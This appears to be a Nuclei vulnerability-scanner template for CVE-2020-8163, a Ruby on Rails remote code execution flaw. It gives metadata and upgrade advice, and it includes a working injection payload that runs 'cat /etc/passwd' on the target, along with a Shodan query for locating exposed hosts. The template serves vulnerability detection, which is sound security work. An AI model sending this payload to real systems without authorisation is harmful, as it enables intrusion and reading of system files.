id: CVE-2020-8163 info: name: Ruby on Rails <5.0.1 - Remote Code Execution author: tim_koopmans severity: high description: Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials. impact: | Successful exploitation of this vulnerability can lead to unauthorized remote code execution. remediation: | Upgrade Ruby on Rails to version 5.0.1 or above. reference: - https://hackerone.com/reports/304805 - https://groups.google.com/g/rubyonrails-security/c/hWuKcHyoKh0 - https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html - https://nvd.nist.gov/vuln/detail/CVE-2020-8163 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-8163 cwe-id: CWE-94 epss-score: 0.97016 epss-percentile: 0.99691 cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rubyonrails product: rails shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails" tags: cve,cve2020,rails,rce,hackerone,rubyonrails http: - method: GET path: - "{{BaseURL}}?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a004730450220623563b3e9081c12b53bbcd5971946c9c090aae5e094e9ee713197bf3a3adc310221008128e62b99d5783f3471f785906e2c3b866514cad77898df0bd2c10a326a190b:922c64590222798bb761d5b6d8e72950